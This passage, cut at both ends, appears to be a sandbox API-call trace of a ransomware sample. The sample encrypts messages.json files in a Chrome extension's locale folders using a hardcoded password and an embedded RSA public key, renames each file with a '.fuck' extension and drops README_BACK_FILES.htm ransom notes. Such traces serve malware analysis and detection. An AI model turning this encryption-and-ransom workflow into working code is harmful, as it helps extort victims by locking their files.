bFailIfExists=0) returned 1 [0260.234] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0260.234] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg")) returned 1 [0260.235] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.fuck")) returned 1 [0260.236] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.236] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.236] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.236] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.236] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.237] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0260.237] AreFileApisANSI () returned 1 [0260.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.237] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.238] GetFileType (hFile=0x5d60) returned 0x1 [0260.238] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.240] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.240] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.241] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.241] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.241] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.241] GetLastError () returned 0x0 [0260.242] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json")) returned 0x20 [0260.242] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0260.243] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.244] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.244] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.244] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.247] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.247] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.247] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.247] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.247] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.247] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.247] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70380) returned 1 [0260.247] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70380, dwCertEncodingType=0x1, pInfo=0x2eb2ff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb3020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb3028*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d680) returned 1 [0260.247] CryptEncrypt (in: hKey=0x2e7d680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.247] CryptEncrypt (in: hKey=0x2e7d680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f748*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f748*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6f748*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f748*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.248] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.252] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.252] CloseHandle (hObject=0x5d5c) returned 1 [0260.253] CloseHandle (hObject=0x5d64) returned 1 [0260.253] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0260.256] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0260.256] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0260.257] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0260.258] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.258] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.258] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.258] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.258] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.259] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0260.259] AreFileApisANSI () returned 1 [0260.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.259] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.259] GetFileType (hFile=0x5d60) returned 0x1 [0260.260] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.260] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.260] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.261] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.261] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.261] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.261] GetLastError () returned 0x0 [0260.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json")) returned 0x20 [0260.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0260.287] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.288] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.290] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.291] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.295] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.295] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.295] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.295] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.296] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.296] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.296] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70270) returned 1 [0260.296] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70270, dwCertEncodingType=0x1, pInfo=0x2eb1d40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1d70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1d78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d4c0) returned 1 [0260.296] CryptEncrypt (in: hKey=0x2e7d4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.296] CryptEncrypt (in: hKey=0x2e7d4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fb88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fb88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.297] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6fb88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fb88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xea, lpOverlapped=0x0) returned 1 [0260.299] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xea, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.299] CloseHandle (hObject=0x5d64) returned 1 [0260.299] CloseHandle (hObject=0x5d5c) returned 1 [0260.299] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0260.303] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0260.304] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0260.305] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0260.306] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.306] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.306] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.306] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.307] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.307] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0260.307] AreFileApisANSI () returned 1 [0260.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0260.307] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.308] GetFileType (hFile=0x5d60) returned 0x1 [0260.308] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.309] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.309] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: 